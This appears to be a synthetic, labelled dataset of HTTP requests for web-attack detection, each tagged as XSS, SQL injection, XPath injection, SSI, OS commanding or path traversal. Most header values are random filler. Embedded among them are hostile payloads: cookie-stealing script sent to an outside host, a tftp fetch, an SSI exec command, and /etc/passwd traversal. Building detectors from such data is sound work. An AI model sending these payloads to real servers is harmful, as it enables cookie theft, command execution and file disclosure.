Referer: http://d83h27ne.it/nmbtrfTa/tib0wg/Rmcugeiw/osBtono9/ahNytrii.swf
TE: trailers
Trailer: Pragma
User-Agent: h7o1eho02n (iX5cig47B; xl@-9aXK; euDj-1.Q)
UA-Pixels: 1597x768
Via: 5.6 104.233.219.156
Transfer-Encoding: oe7u; exdrtc=degaooo
Warning: 951 www.2xdrz.htm "eirrheeitlos31tWp38u" 
X-Serial-Number: 4224204056038719
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35373
Start - Id: 35914
class: XPathInjection
POST /Txq5a@EM7/AhaibrhtnfeG/ai5rs3doaimtc/oOXRs8Lq/sH3c5gR_HPThmOrVlc/etoob4eidun/Otiwh8t4osetateoMrt.jsp? HTTP/1.0
Content-Length: 7
Content-Language: e
Content-Encoding: gzip
Content-Location: http://tadhdrrs.fr/1Iod2iyn/dscohs/u2Irpen.mp3
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Aug 05 04:29:03 GMT
Host: www.sdec.be
Connection: perhree
Accept: */*;q=0.6
Accept-Charset: x-mac-arabic;q=0.8, iso-8859-1, utf-8;q=0.9, windows-1252
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=49187
Client-ip: 182.15.172.231
Cookie: Qib.s3Z=346;irsSn0ee=cggeaon']     |   P     |   //user[    name/text() =    'hIat;me=63717812;dtotcnze=267556
Max-Forwards: 1
MIME-Version: 9.4
Referer: /iwam.php
Trailer: Trailer
User-Agent: 7eoOuraDll
Via: 9.0 www.zgLoss.png:631, 3.8 www.tamhr.html:20601
Warning: 020 www.caes.png:4509 "raEe6" "Thu, 13 Oct 05 01:32:31 UTC"

le=onhe

End - Id: 35914
Start - Id: 47957
class: XSS
GET /wO9ed/iZ/Mu2N3imgYUJVEZgwhere/08execCQWJindATxa/DNrk8ft9l/uDV4QNv2JhRO2twz7Vhg/srkpteoqtrnoS/v1kei@EjPa5ljjS20af/ec/sbG7GRbDHnNPF3cEFy9.tiff?sto=i0ans&hry=5384&bfhor8hpidum=sta&fhuotmqnacpwdD=7310&sbfn3hSowasc1t4=02ataeh&1wuvekRc=s&zqKn=%3Cdiv+++++style+%3D+++%22++++background-image%3A++url%28javascript%3A+++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.vees.com%2Fcgi-bin%2Farng.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B+++%22+%3E&eigp7aeef=bltic9elbin%25me2&mdsmli1=tlchhtolttasbogae HTTP/1.1
Host: 143.227.240.186
Connection: close
Accept: */*;q=0.0
Accept-Charset: shift_jis, iso-2022-kr;q=0.4, iso-8859-15, iso-8859-8;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 236.104.219.184
Cookie: iemeTosr=zxed5mni;eoje9hqqdalnms=42331930;ns6aas=BeoEx;eet0s=69;etni8reyst=nBIO
Cookie2: $Version="803"
Date: Sun, 14 Nov 04 18:24:03 GMT
ETag: "WEVlnkxAx84k3BG8N5"
Expect: 100-continue
From: e4le@beZlsQbrdn.de
If-Modified-Since: Mon, 09 Mar 09 07:35:25 UTC
If-Unmodified-Since: Wed, 16 Dec 09 03:48:19 CET
If-Match: "t_u5tJItSrPP964GpmK"
If-None-Match: "CRiilMO@fXgIVomv"
If-Range: Wed, 26 Sep 07 05:45:41 UTC
Max-Forwards: 44
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: noVEdn roedY=desdiE
Authorization: Digest username="z79nrEqs"
Range: -162,92-
Referer: /b9Osgjd.tar.gz
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 0.5; bm-tR; rv:9.0.2) Gecko/74313537
UA-CPU: 68000
UA-Disp: 216,2039,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3364x532
Via: 2.7 108.124.36.83, 1.8 www.obreie.jpg:938, HTTP/1.8 www.xIote.tiff
Transfer-Encoding: identity
Upgrade: tco/6.7, yt2ien/0.1, jit/2.8, ect/0.5, ket1t/7.7
Warning: 258 www.enaLrqsn.shtml "owbjsDoG4e" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 91293701405226650926
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47957
Start - Id: 41973
class: SqlInjection
GET /p6zfvj8Ou@9CZjh4Bv/aEo1rhtAom2dseenCug/lizy/rD/qnIX9ygkdF8IV6TVeT/olazax-H_zhmc5oVkI.mspx?vgRUhrmfttop=274059&hdetnse=str&Sgemq5f7hsarlo=ko+oer+%271tdrop%7Csya&it0n=Rme5o1stdhtls&eeaecetmdAfo=%27+AND+++USER_NAME%28%29%3D%27oijd HTTP/1.1
Host: 65.221.184.228
Connection: iqrin
Accept: */*
Accept-Charset: gb2312
Accept-Encoding: gzip
Accept-Language: *;q=0.7
Cache-Control: max-age=2657
Client-ip: 124.187.36.33
Cookie: 2cr5wi6taye=rBYh;passthru6QYNzRHy=6334936;z8taxhDean=~lt9ei ;nedanbst6ecnma8=6;Ntliiyi=23
Cookie2: $Version="6"
Date: Sat, 12 Jan 08 24:30:05 GMT
ETag: "F6yDl2ELctqx5Q34"
Expect: momstdt
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 15 Jan 07 20:24:15 UTC
If-Unmodified-Since: Mon, 03 May 10 20:05:42 GMT
If-Match: *
If-None-Match: "mPM7zyqu8.scSvI"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 16
MIME-Version: 0.8
Pragma: h=6
Proxy-Authorization: Basic Y3Q2ZDpxdGVh
Authorization: NTLM c25kYW9pSXRyOWh3bHd0VGVlbmlJZWxtYVJTYmVidG9yeUZucHRkbGM4M3RkeXU=
Range: -221064
Referer: http://bp0eTaS.st/cedHt/ccdtI/s35mm/totaea.bin
TE: trailers,chunked;q=0.7,trailers
Trailer: If-Range
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 4.4; hn-ta; rv:8.1.2) Gecko/38776037
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 329x4778
Via: HTTP/2.7 www.e1fsorj.tiff, 2.5 85.169.153.48, 4twbt/4.1 59.126.200.32
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 701 120.215.22.150 "m6Umsse8crm8abges" 
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41973
Start - Id: 50104
class: XPathInjection
PUT /r.wLoUKIDC/BwRZ8pLuYclib8T/cQUEG4QhsD1OVj/1etHt9irtlaEuSdnl/8SvL.mM@xg.xGYA/ebG1SG/AH6.exe? HTTP/1.1
Content-Length: 267
Content-Language: pIleo
Content-Encoding: deflate
Content-Location: http://www.ao9cjumg.com/spEqi/ravrlno/btsp6t.cgi
Content-MD5: bWppb3NFckFzc2xic3B0bA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 11 Jul 04 12:18:23 UTC
Host: 143.70.214.235:112
Connection: close
Accept: */*
Accept-Charset: iso-8859-9, iso-10646-ucs-2, euc-cn, ks_c_5601-1987;q=0.8
Accept-Encoding: compress, gzip, compress;q=0.5, identity;q=0.4
Accept-Language: ocode-ion, mentUn-mvmcwmLp;q=0.9, shp1f-hlnRslh;q=0.9, u7n-5;q=0.7, b-eypblnf9;q=0.1
Cache-Control: no-transform
Client-ip: 60.34.2.0
Cookie: n4tloawz=76;8edk9dP1F=39221;bdho=05;bshutdownYD=(i < count(i9/child::text())     and     j <    count(ma/child::comment())   and    k <   count(rm/child::*) );naa9=48306513
Cookie2: $Version="88"
Date: Tue, 08 Jan 08 17:41:48 GMT
ETag: W/"xDKunA1jLnUc9pr"
From: girputi@ti4h.biz
If-Modified-Since: Sat, 18 Dec 04 13:00:45 GMT
If-Unmodified-Since: Sat, 11 Feb 06 04:57:48 UTC
If-Match: *
If-None-Match: "Tmq_bkGS5GuEOqrhVGFE"
If-Range: "LMweqR4hdFuoIRsFL"
Max-Forwards: 93
MIME-Version: 9.8
Pragma: vpceld=na
Proxy-Authorization: Basic c2ppdHBkOmRuZWpuc2M=
Authorization: Basic ZW9iaXIyaHQ6ZzFtZGs5YQ==
Range: 421358-283
Referer: /astiA9r/9her/ornto.jpeg
TE: gzip,chunked;q=0.8,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.3 (Windows; U; Windows NT 8.9; in-hw; rv:1.1.1) Gecko/99135754
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1334x3264
Via: ei8i67/9.1 www.nvTn.png:5919, 4.8 29.127.124.251, 6.2 www.5eht1y.shtml
Transfer-Encoding: iBtnA; srhao6yC=ros4iwq
Upgrade: nnMyet/2.6, nrE/8.0, uath/4.7
X-Forwarded-For: 12.248.6.194
----: ------------

ae6aoreiope=195&rywtritvc=msidemeacceptnaroD&OVzaH0A=oihfiha71wn2Eheg&r4oiasoaattaa=oS&lzoAbincnDH1Xg=ol psi&oapO=h@aaw&tuistaPesullU=esi9nOtandw5p]sock_stream'e@@a t&uV2etsni=tcGFIsVT7l&ykbhel9aU=  hdy<zhiaai<hwindow.opena/C&mslath62ante=;nt]dau0

End - Id: 50104
Start - Id: 42955
class: OsCommanding
GET /aDUFsUa.htm?ocieaterdclE=%5D&0NNk=%40eefi&ot3danedefar9h=27268 HTTP/1.0
Host: 215.228.13.27
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: hyejs4eo='ife'
Cookie: feosRaau='  ;   tftp     -c  get  www.neorlell.com:/nd.tar;ahFue=negsmabhrcp;mr=VeeoswhtaccesfsgA%s
Cookie2: $Version="527"
Date: Wed, 12 Aug 09 15:44:25 GMT
ETag: W/"dfwVmnfK9h2fhEn1wTy"
Expect: ohdoc=nneryyAn;gSce
If-Modified-Since: Fri, 30 Oct 09 04:08:59 CET
If-Unmodified-Since: Thu, 23 Feb 06 03:51:36 GMT
If-Match: "W5feT-C89H4_lcJyZ-g"
If-None-Match: "Tvp3X4WXfIDrFa7"
If-Range: "l46EaoIO95N7c85V"
Max-Forwards: 7588
Pragma: pthRn='7sae'
Proxy-Authorization: Basic M251amFvaDp6anRu
Authorization: Basic c2l0dHQ6bzlzcg==
Range: -715520,-4
Referer: /mrfrues/icahn4h/den6/eGoUtrne/svnhstni.nsf
TE: trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: rfvsEDnvupt
UA-Color: color32
Via: 1.4 www.nsskoltn.gif
Transfer-Encoding: compress
Upgrade: ra4F/2.5, nr6r/2.4, ltj/8.1, osrll/1.3
Warning: 188 206.78.250.6 "rfstcWcoouvsl" "Mon, 24 Jan 05 04:09:16 UTC"
X-Forwarded-For: 9.108.251.79
X-Serial-Number: 61844777851149427
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42955
Start - Id: 39145
class: SSI
GET /b2lv/P1R/nC2ORstKbpa4-/rXm.bKeH2clgaf/yUcbe@XRhttpM0echoIIP/nele9pstwe/naH.DYkZ/tbobor/lSxWIcxF/.0G_aX@Vjtn/RI.js?nXOqfsw1=cq&tuwtelrEoraKn=dfs&UqXp.8zhLm=134378367&Lliihrtoti=cs&irol7aemjyten=mrn&Tr-5MK=8&ZTbnoyokpSs=tdIliq&adaemfo0n=IEegfnhdttrvtrNei HTTP/1.0
Host: 208.175.212.240:80
Connection: close
Accept: audio/x-wav, image/*
Accept-Charset: isiri-3342;q=0.4, iso-8859-8-i;q=0.5, iso-8859-4;q=0.7, cp-932;q=0.5, iso-8859-3
Accept-Language: *;q=0.7
Cookie: twP=likelbosl7vbscriptkn0;oom=if3-B@WJ9oZQ;tTtsmsnkl=07936;alttikuI9ehni=3817
Date: Sun, 17 Oct 04 21:35:19 GMT
Expect: dUdoE
If-Match: *
If-Range: Wed, 01 Sep 04 23:14:42 CET
Max-Forwards: 775
Proxy-Authorization: odhs nmeoroy=5Nod7na
Referer: /Crft/vhgt/HnofrL/ss5rbzae.mdb
User-Agent: <!--#echo var="date_gmt"-->
Upgrade: uiI/5.5
Warning: 619 www.wouEwn.jpeg "nsndett" 

null

End - Id: 39145
Start - Id: 36115
class: PathTransversal
GET /e_EK6/iEQffZM6f_PCxpno0VGO/eg/N2LB_pKr@bB/l.TkOb/saF.css?tiuhn7ioeshmp9e=aje1vSwsba&q2sztc2h8ooci4e=xpvR1M&aeNAnRrnt=%5CWINNT%5Csystem.ini&gpwu=like&nhyeherei0aoot=caOqreehgeen&elmsasrpn0t8=ehn%5C&srortaHihi=58 HTTP/1.1
Host: 43.215.76.200:657
Connection: hlOFws
Accept: audio/basic, application/*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, gzip;q=0.5
Accept-Language: *
Cache-Control: max-age=11286
Client-ip: 180.199.9.54
Cookie: ai1eya9E3=74546;ndhc=19437879;itEinsl0El=systemoselecthal=aInbncn\e ;qchnnhin=g52tneiieae;eei=9;l6=ndncddtdgtxyu
Cookie2: $Version="163"
Date: Sat, 11 Mar 06 02:10:00 GMT
ETag: "tJMxSUmbHfv8AsK3jw"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Thu, 27 Mar 08 18:49:54 CET
If-Unmodified-Since: Fri, 22 Oct 04 18:45:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: 9844-66,0-,-297
Referer: /nsuseisa/tMmlr.cgi
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: nn1derntea
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: 4.3 www.nhwhomS5.gif, 4.8 www.eienh.js
Transfer-Encoding: deflate
Upgrade: eniw/0.3, sum/7.6, tRyoa/3.2, eolses/1.6
Warning: 643 99.90.218.216 "i6te3torsbteItixa4tu" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 7294579742813634
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36115
Start - Id: 48167
class: XSS
GET /rVN@XGGAqNDobA/ete3vrse64eAn06oidty/Tebcfos3ziuooI/bNst/@GQtLscriptYdfuRs/ixqc5VuqvIX/si.gif?CGvO=%3Cform%2Bname%3Dm+++%3E%3Cselect%2Bname%3D5cI7oe+%3Ehttp%3A%2F%2Fwww.azSnSS.com%2F7%2F%3F%3C%2Fselect++++%3E%3C%2Fform++%3E HTTP/1.0
Host: 148.153.63.187
Connection: poeOde
Accept: text/*
Accept-Charset: koi8-r;q=0.9, windows-1250;q=0.9, x-mac-cyrillic, x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: zadr2bem=oAOts
Client-ip: 238.195.35.222
Cookie: fidngao1A=r7sock_streamsar tee[wheree;t0nTee7sdc=e0v$atuD;1Habwheremxi0fTnph-=2;f6y=6825726;nrteroendta0e9o=9autoexech
Cookie2: $Version="6"
Date: Fri, 31 Jul 09 24:10:01 GMT
ETag: "cj5SXbMwdvzn4Oiia"
Expect: 100-continue
From: sfatroh@4tt9delj7a.org
If-Modified-Since: Tue, 22 Feb 05 20:22:23 GMT
If-Unmodified-Since: Tue, 21 Oct 08 07:14:07 GMT
If-Match: *
If-None-Match: "O4ZlRQP9D3ySoFX"
If-Range: Sat, 31 Dec 05 16:00:02 CET
Max-Forwards: 4862
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic dG5hc3UzZWk6ZXR1YWE=
Authorization: NTLM dHJrZWRhZDlzZXR5b2VlYWJUSm1sZHNRbXRpaG5ldG5sbG90
Range: 248-
Referer: http://uatrnml.cz/3gecea.php3
TE: trailers,deflate;q=0.5,chunked
Trailer: From
User-Agent: Mozilla/6.1 (compatible; MSIE 5.1; Linux i586; gygihmjld; rkta; laoY5aE5)
UA-CPU: MIPS
UA-Disp: 472,3569,8
UA-OS: Win98
UA-Color: color16
Via: Xtp/2.8 68.47.189.195, FTP/8.0 106.168.39.64
Transfer-Encoding: deflate
Warning: 110 www.gonm.png:285 "e4neSfElotnmne" 
X-Forwarded-For: 129.132.255.71
X-Serial-Number: 532844106814003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48167
Start - Id: 40810
class: SSI
GET /fbs/JvCDLH/iftxlq/B1O/eUn2LSeM2wl/ptaIhSe9XcSCwgY/ati0anio/Ywindow.openbP3/troHIHetDDdfY3XsQ/d7tu/rueRuiergG.asmx?ondptii=%3C%21--+++%23odbc+++++connect%3D%22rhams%2Cawkwio%2Cemo%22++++++statement%3D%22select++++*++from+a%22--%3E&sroovahlra3=srto4laouer&6at=rcpdgirl%299tr&0afFaccess_log7Hbodylocationz_CM=9828823886 HTTP/1.1
Host: www.Hsdftx.com
Connection: esceDees
Accept: image/gif
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: min-fresh=03
Client-ip: 34.137.144.86
Cookie: dt7sdarannd=usock_streamo
Cookie2: $Version="4"
Date: Thu, 24 May 07 18:25:55 GMT
ETag: "V0yqNhaPfiAfr9wMm2IH"
Expect: snetell=1iri3waa
From: iiljwdi@httr81j.de
If-Modified-Since: Wed, 18 Jan 06 11:58:44 GMT
If-Unmodified-Since: Sun, 03 Aug 08 06:57:00 UTC
If-Match: "SnWfAvpwjBHRiWG"
If-None-Match: "CwX-fkL1.4XkvjLfXv"
If-Range: "Jz@uU_i@G5wY0Wp"
Max-Forwards: 507
MIME-Version: 8.4
Pragma: ektelqv='eana'
Proxy-Authorization: Digest opaque="9des"
Authorization: lgn0a eiae3xs=niaoa7wd
Range: -4,-190,-803524
Referer: http://Ngsne.gov/ReoCcSe.cgi
TE: trailers,trailers,gzip
Trailer: Range
User-Agent: Mozilla/4.1 (X11; U; Solaris 9.2; tr-at; rv:0.0.9) Gecko/66572836
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 871x928
Via: 7.1 www.v5steer.jpg
Transfer-Encoding: eneaao; tdqip=erSa
Upgrade: t9tt/3.9, 2htSi/0.2, hta3f/5.3
Warning: 985 www.atEa.jpg:824 "esoj" "Tue, 11 Nov 08 09:01:56 UTC"
X-Serial-Number: 17196143235816087076
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40810
Start - Id: 41886
class: SqlInjection
GET /lMax/2.dB_LMfprpe0_.exe?Dn0Oe=eptsrQeee72&iuos4soeret=e1a&fne=%27+++++%2B++++%28+++++SELECT+TOP++1++oe+FROM+++eieb%29+++++%2B++++%27&Zhtg=5gcaaatg&tulb8t=sheJa&s0emde=n_UMsTIJHQ&rtegMt=erj&havinglogcnullm=vorc&lw4n3ya=esteaCEfehe%3Bo&47do6=a%3Bu%5D&tLRQeRKqUn0o=6191039465 HTTP/1.0
Host: 8.248.225.89:80
Connection: Lno0s5co
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 143.204.36.23
Cookie: gnavser5=rR;GIUe=4951;ncti8zltb=t;Cerro8=sosTs7sx:jn7qro0a4
Cookie2: $Version="03"
Date: Tue, 17 Feb 04 16:16:34 GMT
ETag: "gPXWXCyV9O4k_0w1BPB"
Expect: pdcaa8
From: elee@hieitj.de
If-Modified-Since: Fri, 09 Jan 09 13:59:28 GMT
If-Unmodified-Since: Wed, 30 Jul 08 07:56:49 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Mar 07 21:36:14 GMT
Max-Forwards: 5651
MIME-Version: 8.7
Pragma: pu='9gemT99'
Proxy-Authorization: Digest uri=http://www.8ios34Ss.be/GyNmnu/hNIaa/tnui75/Ns1n8sf/efisp.php3
Authorization: NTLM bXNlYnNwYWZvZXRhZnN6bmE1RW9IcmNEZGlvdG9sSGRhb2VpbXNoYWFFdG5zNzJ0
Range: 2764-93323,17883-91
Referer: /Tyihbt/ee1hgrrl/hedAte/tdAEP.jpeg
TE: chunked,trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.5 (Machintosh; U; PPC 7.0; re-lo; rv:2.5.1) Gecko/44918428
UA-CPU: PowerPC
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 044x365
Via: 6.4 www.mezydhs.css, HTTP/9.0 94.9.254.44
Transfer-Encoding: deflate
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 181 www.e4hach.tiff:99487 "eyten3eElsgEginsaoi" "Sun, 29 Feb 04 08:39:55 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41886
Start - Id: 46428
class: PathTransversal
GET /xir/ensg-QAu3LvB2l/iviltip6eiH9pblxhr/w70a/xvy5@LwMqbpZuo/hke2rw8zEeoxpqi4t/Jb/y03G2DPZTwQ_nYS/6t8qft.png?aR5der0r4te=n4Zz7r0s2lp.&eyntlsen=86302536&we1aodeyciaarr=4&gitjLinxNec=%3Ahtn&ysnZBettX=566&WetoAndtlv=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&ossheivareogyw=eaO3Smehoihe&p8e=b-vK0y8s%40&esp=3jua.ewC&eahusteq=59295255&dyiavrsarh=azF32bi&k-6S2V4xp_0iframe9=3hnua&egrisnc=eM-.1JK.2N8e HTTP/1.0
Host: 63.162.228.153:65
Connection: line
Accept: image/*, video/mpeg
Accept-Charset: hz-gb-2312, shift_jis, utf-7;q=0.1, euc-cn;q=0.3, windows-1251;q=0.5
Accept-Encoding: 
Accept-Language: en-pb;q=0.7, l-alWslnft;q=0.4
Cache-Control: no-store
Client-ip: 124.211.79.221
Cookie: uy=r2vIA;frdth=em;yLVbmmail07=6;c5bzb@httpo7=wdtfIAswonrdsdnace;7hdnsm=je0;@NconnectExBF=KooiaLh
Cookie2: $Version="221"
Date: Wed, 21 Jan 09 05:33:59 UTC
ETag: "eWpWBxsytAHjKXrL7l"
Expect: rgnRrl
From: ore8y@Ydkeykr.uk
If-Modified-Since: Wed, 08 Apr 09 20:57:38 GMT
If-Unmodified-Since: Tue, 16 Jan 07 09:43:23 CET
If-Match: *
If-None-Match: "fzHackZ@wH13hnzB"
If-Range: Wed, 30 May 07 02:29:27 CET
Max-Forwards: 319
MIME-Version: 2.3
Pragma: 3a=rreu0
Proxy-Authorization: Digest nonce
Authorization: iaObhc sAeoin=aw9lo
Range: 3341-,1-,7-
Referer: /estoe/7roatn/twluQf7/datCjr/ennr.css
TE: deflate;q=0.5,chunked;q=0.9
Trailer: Trailer
User-Agent: Mozilla/9.8 (X11; U; Linux i386 3.5; Et-tp; rv:1.3.8) Gecko/31043809
UA-CPU: x86
UA-Disp: 5419,5549,32
UA-OS: Windows 98
Via: tco/4.2 www.anNeeU.js, FTP/7.6 www.xnund.tiff, yneiA/1.4 66.253.106.71:056
Transfer-Encoding: identity
Upgrade: ownrn/1.4, lmrs/5.6, aatus4/6.8
Warning: 223 232.197.120.51 "npays3" "Wed, 14 Jun 06 02:27:53 UTC"
X-Forwarded-For: 242.103.195.112
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46428
Start - Id: 40354
class: SSI
POST /90libco/NE/ZfNGkuinput/ethcq8Uotedeespai/0sRcnEc/nJnaehs0hjstosplskt.bin? HTTP/1.1
Content-Length: 120
Content-Language: Otobrs
Content-Encoding: identity
Content-MD5: ZXNuc2F0b2hhZXJVaWF0ZQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 18 Mar 09 08:47:33 CET
Host: 28.184.119.65:80
Connection: close
Accept: application/rtf;q=0.5, application/rtf;q=0.4, text/*
Accept-Charset: iso-8859-8;q=0.5, iso-8859-6;q=0.9
Accept-Encoding: 
Accept-Language: *
Cookie: aoatpw=fuA4tb;tchfA0ttce=<!--   #exec  cmd="c:\progra~1\t6oki7p\np9ooN\cc.exe     d:\pi\www.asndat.org\Iebpefkk\database.mdb /x  exporttofoxpro"-->;OML9WyK=eitrteghttpsen;Re=0LegSook4Ohw
Date: Fri, 21 Dec 07 21:03:58 CET
If-Match: "uxCgHhl@exhqRMuqEVq"
If-None-Match: "v6FtdtDrGMBZ4xJ92my"
Max-Forwards: 61
Authorization: Basic ZWxzbnJBOnlrcGFz
Referer: /nw2t8iH.mdb
User-Agent: Mozilla/8.0 (compatible; MSIE 5.3; Open BSD i386; guy0ocrrCi)
Via: 7.2 www.edvnny4.gif, 9.4 www.bEEJnol.js:470

ceQlinaecaeye=re18fMG&adXGI=tiOlsxeqpr1o?V&wW23BnF8N=0ndelete&esdngY=shuitu&zsX3xIP-=hte8osindlqxp_m0&rsraa=53O3s_mAvq

End - Id: 40354
Start - Id: 46174
class: PathTransversal
GET /icbSLAqQbQBMLZ7UfD9I/3y8JZYhE-sTToO20h/emkoejloRtwNiea/andee2amse47eihiohm/tl5sWu9NEn5H/ifDHRoUHgaPy_1j/a7dz.bin?olTsasrRt=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&2Omusrnncctm=inxeCcez+%26ztatxp_teasb&wslgeZuiMedg=fdnarvnh&dneo1pcei6aitfh=thjn&Tlrohtehezoslos=4ghtttt%5D&cmFoizncenntrhe=70&htex=8876&qhq=na HTTP/1.0
Host: www.yke9.de
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: Tatn-qeye1;q=0.2, 76o-qnGqman, gt-jjm;q=0.6, rwycopcm-sf7msca, eeloem4-r
Cache-Control: no-store
Client-ip: 200.242.126.46
Cookie: ndwHNcG=bnhnis(hruuyiform;WpTEimgI=2tlcCe0Elrt
Cookie2: $Version="18"
Date: Mon, 03 May 10 16:01:56 UTC
ETag: "XxIGPTgMgE9f0ZK"
Expect: wpscl=eLmpno
From: e6aS@otptT.st
If-Modified-Since: Thu, 09 Feb 06 21:28:50 GMT
If-Unmodified-Since: Sun, 11 Oct 09 16:11:07 CET
If-Match: "aqd@KJRL3AvPd3MM9zw"
If-None-Match: *
If-Range: Wed, 26 Jan 05 19:39:18 UTC
Max-Forwards: 98
MIME-Version: 6.1
Pragma: N4ata=s
Proxy-Authorization: NTLM cmVoc1RydHcwRnRyeTlsYWV0dHRUaHpveWtvcmlzZWFvaW55dQ==
Authorization: NTLM d2xwcmVzdGhzbHQ1ZTFPOWlyc3VuaGRuTGxlaGF0dnQyc3RpQWVoeQ==
Range: -62,23826-
Referer: http://avnet.it/Flaa2uDs/mWlf/rhbs/uili.php3
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: perPrcosbtn
UA-CPU: StrongARM
UA-Disp: 943,4647,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 4.1 146.144.144.133, 0.1 164.255.104.247, HTTP/9.4 137.133.162.157
Transfer-Encoding: gzip
Upgrade: amiap/9.1
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 143207616945
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46174
Start - Id: 39422
class: SSI
GET /yuz.TXMvWq9bG/Ry7mmrnscp/rqreheriiz7vus6llmi/o5itodatlanies/oOd--Jw/IiechonOm8Ss-Fr/X.pDX9K0yYAWall/rsige70lhuicohon/ere7qG37FQRMjfvR/@nwzw8child2C5w.gOM.exe?eost1tesnlueaia=ocfh%27&e1dSBuso=aeo%25t&wgF=%3C%21--%23email+fromhost%3D%22www.nowmoih.com%22+tohost%3D%22mailbox.gpl.com%22+message%3D%22Lensi+tscoqe+6oswvhr+goyukq%22+fromaddress%3D%22mboms.com%22+toaddress%3D%22cwe9y.ai.com%22+subject%3D%22Id%22+sender%3D%22tere.com%22+replyto%3D%22tleml2.com%22+cc%3D%22Ep%22+inreplyto%3D%22etee+tiYs+e9piot%22+id%3D%22uru2mail%22+--%3E&dri8=lrtic7Emohaving&MZ-fLLhdZ4deleteE=70048714&RDi5likefM4y=bee&w9inuYgutnnen=ern32iu3tri6epiIt&o6dainezhz=th2e&oeesrqnl=rnr%27r%5Cmhip+T4httpejrr&ssjilyE1dBbRsAz=s0JdmqU HTTP/1.1
Host: www.Nr6senia.gov
Connection: keep-alive
Accept: image/jpeg;q=0.2
Accept-Charset: windows-1252, ks_c_5601-1987;q=0.1, windows-1251
Accept-Encoding: deflate;q=0.3, compress;q=0.1, identity
Accept-Language: eisE-t, r-5Priash, xfhetny-eeannkn;q=0.4
Cache-Control: no-transform
Client-ip: 93.53.204.166
